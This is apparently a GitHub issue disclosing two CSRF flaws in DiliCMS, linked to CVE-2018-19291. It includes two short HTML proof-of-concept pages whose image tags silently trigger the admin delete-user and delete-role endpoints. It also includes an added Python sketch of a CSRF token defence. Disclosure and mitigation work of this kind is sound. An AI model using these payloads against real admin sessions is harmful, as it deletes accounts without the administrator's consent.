There are two CSRF vulnerabilities that can delete a user or usergroup
Rich4ever opened this issue · 1 comment
Rich4ever commented
Software Link : https://github.com/chekun/DiliCMS
After the administrator has logged in, open the page.
test.html delete user POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>
test2.html delete group POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
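Added example (not code from the report or from DiliCMS): a Python sketch of the server-side check that stops the `<img>`-triggered delete, using the synchronizer-token pattern, with the reported logged-in-only GET behaviour beside it for contrast. The session dict and user table are constructed stand-ins, and the route names are hypothetical.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Per-session random token: kept server-side and embedded in a hidden
    field of the real delete form. A cross-site <img> request cannot read it."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def vulnerable_delete_user(session, method, user_id, users):
    """Behaviour the report describes: being logged in is the only check, so a
    GET fired by an <img> tag on another site (cookies attached) deletes."""
    if not session.get("logged_in"):
        return False
    return users.pop(user_id, None) is not None


def hardened_delete_user(session, method, user_id, submitted_token, users):
    """Same action, gated on a state-changing method plus a valid session token."""
    if not session.get("logged_in"):
        return False
    if method != "POST":  # GET must never change state
        return False
    expected = session.get("csrf_token")
    if not expected or submitted_token is None:
        return False
    if not hmac.compare_digest(expected, submitted_token):  # constant-time compare
        return False
    return users.pop(user_id, None) is not None


def cross_site_img_request(session, user_id, users):
    """What the POC page actually sends: GET, session cookie, no token field.
    Returns True when the hardened handler refuses the deletion."""
    before = len(users)
    hardened_delete_user(session, "GET", user_id, None, users)
    return len(users) == before


def demo():
    # Constructed stand-ins for the admin session and the user table.
    session = {"logged_in": True}
    users = {1: "admin", 2: "editor"}
    vulnerable_delete_user(session, "GET", 1, dict(users))  # succeeds on a copy
    token = issue_csrf_token(session)
    refused = cross_site_img_request(session, 1, users)  # True: blocked
    legit = hardened_delete_user(session, "POST", 1, token, users)  # True: real form
    return refused, legit
```

A SameSite cookie attribute on the admin session cookie is a useful second layer, but the token check is what makes the endpoint safe regardless of browser defaults.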
fgeek commented
Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.